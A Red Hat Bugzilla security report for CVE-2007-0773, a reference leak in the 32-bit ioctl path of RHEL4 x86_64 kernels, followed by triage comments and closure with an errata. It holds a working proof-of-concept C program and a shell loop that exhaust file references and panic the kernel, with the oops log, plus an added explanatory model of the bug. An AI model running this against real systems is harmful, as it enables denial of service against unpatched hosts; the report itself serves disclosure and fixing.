Bug 243252 (CVE-2007-0773) - CVE-2007-0773 lost fput in a 32-bit ioctl on 64-bit x86 systems
Summary: CVE-2007-0773 lost fput in a 32-bit ioctl on 64-bit x86 systems
Alias: CVE-2007-0773
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: x86_64
OS: Linux
Target Milestone: ---
Assignee: Jason Baron
QA Contact: Martin Jenner
Depends On:
Reported: 2007-06-08 10:06 UTC by Marcel Holtmann
Modified: 2019-09-29 12:20 UTC (History)

Fixed In Version: RHSA-2007-0488
Doc Type: Bug Fix
Doc Text:
Clone Of:
Last Closed: 2007-06-25 18:05:13 UTC


System: Red Hat Product Errata
ID: RHSA-2007:0488
Private: 0
Priority: normal
Status: SHIPPED_LIVE
Summary: Important: kernel security update
Last Updated: 2008-01-09 18:29:42 UTC

Description Marcel Holtmann 2007-06-08 10:06:03 UTC
The SWsoft Virtuozzo/OpenVZ Linux kernel team would like to note that the first part of
CVE-2005-3044 "fput in a 32-bit ioctl on 64-bit x86 systems" is still not fixed
in the RHEL4 kernel 2.6.9-42.0.8. As a result, local users are able to cause a
denial of service.

The following patch fixes this problem in mainline Linux:

The following script demonstrates the resource leakage:
[vvs@dhcp17-60 ~]$ uname -a
Linux dhcp17-60.qa.sw.ru 2.6.9-42.0.8.EL #1 Tue Jan 23 12:34:49 EST 2007 x86_64 x86_64 x86_64 GNU/Linux
[vvs@dhcp17-60 ~]$ id
uid=500(vvs) gid=500(vvs) groups=500(vvs) context=user_u:system_r:unconfined_t
[vvs@dhcp17-60 ~]$ cat tiocgdev.c
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define TIOCGDEV        _IOR('T',0x32, unsigned int)

int main(int argc, char *argv[])
{
        int fd, ret;

        /* any regular file will do; the ioctl is expected to fail on it */
        fd = open(argv[0], O_RDONLY);
        if (fd < 0) {
                return 1;
        }
        /* 32-bit compat TIOCGDEV path: on the affected kernel the file
         * reference taken inside the handler is never released */
        ret = ioctl(fd, TIOCGDEV, NULL);
        if (ret < 0) {
                return 1;
        }
        return 0;
}
[vvs@dhcp17-60 ~]$ gcc -m32 -o tiocgdev32 tiocgdev.c --static
[vvs@dhcp17-60 ~]$ cat /proc/sys/fs/file-nr
528     0       24581
[vvs@dhcp17-60 ~]$ for i in `seq 1 10000` ; do ./tiocgdev32 &>/dev/null ; done
[vvs@dhcp17-60 ~]$ cat /proc/sys/fs/file-nr
10452   0       24581

The exploit overflows file->f_count and crashes the node:

Unable to handle kernel NULL pointer dereference at 0000000000000038 RIP:
PML4 5cf1067 PGD 8765067 PMD 0
Oops: 0000 [1]
Modules linked in: md5 ipv6 parport_pc lp parport autofs4 sunrpc ds
yenta_socket pcmcia_core ipt_REJECT ipt_state ip_conntrack iptable_filter
ip_tables dm_mirror button battery ac uhci_hcd snd_ens1371 snd_rawmidi
snd_seq_device snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd_page_alloc
snd_ac97_codec snd soundcore e1000 floppy ext3 jbd dm_mod mptscsih mptsas
mptspi mptfc mptscsi mptbase sd_mod scsi_mod
Pid: 3753, comm: tiocgdev32 Not tainted 2.6.9-42.0.8.EL
RIP: 0010:[<ffffffff80199606>] <ffffffff80199606>{vfs_getattr+24}
RSP: 0000:0000010008e69ea8  EFLAGS: 00010206
RAX: ffffffff80449cc0 RBX: 0000000000000000 RCX: 0000010008ec8148
RDX: 0000010008e69ef8 RSI: 0000000000000000 RDI: 0000000000000000
RBP: 0000010008e69ef8 R08: 0000010008ec8140 R09: 00000000ffffd854
R10: 0000010008e68000 R11: 0000000000000000 R12: 0000010008e69ef8
R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
FS:  0000002a96a2d2a0(0000) GS:ffffffff80545480(0000) knlGS:00000000f7ff58e0
CS:  0010 DS: 002b ES: 002b CR0: 000000008005003b
CR2: 0000000000000038 CR3: 0000000000101000 CR4: 00000000000006e0
Process tiocgdev32 (pid: 3753, threadinfo 0000010008e68000, task
Stack: 0000010008ec8140 000001000929dcc0 00000000fffffff7 0000010008e69ef8
       0000000000000000 ffffffff80199738 00000000ffffd7a8 00000000ffffd854
       0000000000000000 ffffffff80127e9f
Call Trace:<ffffffff80199738>{vfs_fstat+41}

Code: 4c 8b 66 38 ff 90 a0 01 00 00 85 c0 75 6e 49 8b 84 24 70 01
RIP <ffffffff80199606>{vfs_getattr+24} RSP <0000010008e69ea8>
CR2: 0000000000000038
 <0>Kernel panic - not syncing: Oops
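As an added illustration (not code from the report or from the kernel), the following user-space C model shows the reference-counting mistake behind a lost fput(): a handler that takes a reference with fget() and returns early without fput() leaks one reference per call, which is the steady growth in /proc/sys/fs/file-nr shown above, while a single-exit handler stays balanced. All names here (model_file, model_fget, model_fput, do_ioctl_op, compat_ioctl_buggy, compat_ioctl_fixed, refcount_after) are hypothetical stand-ins.

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical stand-in for struct file; f_count models the kernel's atomic_t. */
struct model_file { uint32_t f_count; };

/* fget(): caller now holds one extra reference and must drop it with fput(). */
static struct model_file *model_fget(struct model_file *f) { f->f_count++; return f; }
/* fput(): releases the reference taken by model_fget(). */
static void model_fput(struct model_file *f) { f->f_count--; }
/* Hypothetical underlying operation: succeeds for req != 0, fails for req == 0. */
static int do_ioctl_op(unsigned int req) { return req ? 0 : -1; }

/* Buggy shape: the early return skips fput(), so every failing call leaks a reference. */
static int compat_ioctl_buggy(struct model_file *f, unsigned int req) {
    struct model_file *filp = model_fget(f);
    if (do_ioctl_op(req) < 0)
        return -1;          /* BUG: reference from model_fget() is never dropped */
    model_fput(filp);
    return 0;
}

/* Fixed shape: one exit path, so fput() always balances the fget(). */
static int compat_ioctl_fixed(struct model_file *f, unsigned int req) {
    struct model_file *filp = model_fget(f);
    int ret = do_ioctl_op(req) < 0 ? -1 : 0;
    model_fput(filp);
    return ret;
}

/* Drive `calls` failing ioctls through a handler and return the final f_count;
 * the open fd itself holds one reference, so a balanced handler leaves 1. */
static uint32_t refcount_after(int (*handler)(struct model_file *, unsigned int),
                               unsigned int calls) {
    struct model_file f = { .f_count = 1 };
    for (unsigned int i = 0; i < calls; i++)
        handler(&f, 0);     /* req 0 forces the failing path */
    return f.f_count;
}

int main(void) {
    printf("buggy: f_count=%u  fixed: f_count=%u\n",
           refcount_after(compat_ioctl_buggy, 10000),
           refcount_after(compat_ioctl_fixed, 10000));
    return 0;
}
```

In the real kernel the leaked reference means the struct file is never freed after close(), which is why the allocated count in /proc/sys/fs/file-nr keeps climbing across process exits.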

Comment 1 Eric Sandeen 2007-06-08 16:53:20 UTC
Ok, so this is a dup of Bug 227978 for z-stream?

If so maybe Jeff should take it, since he did the original work in the other
bug?  I'm happy to ferry this in for z-stream, but it seems like "his" bug, so
I'll give him first crack at it. :)


Comment 2 Eric Sandeen 2007-06-08 17:25:29 UTC
Talked with Jeff... over to him since he did the original work.


Comment 5 Jason Baron 2007-06-12 15:35:07 UTC
committed in stream rhel-4.5.z build 55.0.1

Comment 8 Red Hat Bugzilla 2007-06-25 18:05:13 UTC
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

